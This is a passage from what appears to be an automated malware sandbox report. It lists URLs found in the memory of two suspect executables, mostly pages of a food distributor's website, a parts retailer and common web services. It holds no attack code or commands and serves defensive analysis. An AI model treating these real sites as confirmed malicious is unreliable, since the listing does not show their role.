nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655090543.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?520556228c0113270c0c772027905838
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://inhouse.pohlfood.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650670746.00000000076B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://napoleongames.be
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/catalog?view=class&#038;limit=200
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?offset=0&amp;limit=250&amp;col=class&amp;dir=ASC&amp;term
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizza
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=Mediterran
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=mexican
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parts.com-sit.com/de
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/cart/request-quote/
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/about-300x298.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/woocommerce_uploads/logo-sdw6o6.gif
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#breadcrumb
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#primaryimage
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#website
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/?s=
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/Flyers
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/about/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/comments/feed/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/contact/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/employment-opportunities/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/feed/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/flyers/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/news/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/order/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/our-team/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/privacy-policy/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/service-area/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/vendors/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/LogoNEW-250x129.jpg
